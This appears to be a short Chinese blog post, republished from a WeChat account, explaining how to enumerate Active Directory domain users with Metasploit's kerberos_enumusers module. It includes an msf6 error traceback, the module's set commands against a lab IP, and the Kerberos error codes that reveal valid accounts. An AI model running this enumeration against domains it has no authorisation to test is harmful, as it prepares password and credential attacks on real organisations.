使用msf进行域用户枚举,使用到模块为kerberos_enumusers模块
auxiliary/gather/kerberos_enumusers
但这里有一个坑,msf6的user_file竟然要求是NO,但你不填又会报错。
[-] Auxiliary failed: Metasploit::Framework::LoginScanner::Invalid Cred details can't be blank, Cred details can't be blank (Metasploit::Framework::LoginScanner::Kerberos)
[-] Call stack:
[-] /usr/share/metasploit-framework/lib/metasploit/framework/login_scanner/base.rb:266:in `valid!'
[-] /usr/share/metasploit-framework/lib/metasploit/framework/login_scanner/base.rb:194:in `scan!'
[-] /usr/share/metasploit-framework/lib/msf/core/exploit/remote/kerberos/auth_brute.rb:57:in `attempt_kerberos_logins'
[-] /usr/share/metasploit-framework/modules/auxiliary/gather/kerberos_enumusers.rb:36:in `run'
[*] Auxiliary module execution completed
设置以下内容,效果:
set domain enginge.com
set rhosts 192.168.183.133
set user_file ~/user.txt
run
三种状态的错误代码分别为:
KDC_ERR_PREAUTH_REQUIRED-需要额外的预认证
KDC_ERR_CLIENT_REVOKED-客户端凭证已被吊销
KDC_ERR_C_PRINCIPAL_UNKNOWN-在Kerberos数据库中找不到客户端
回复"230921",可获取各种枚举工具。
原文始发于微信公众号(Enginge):域用户枚举攻击
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论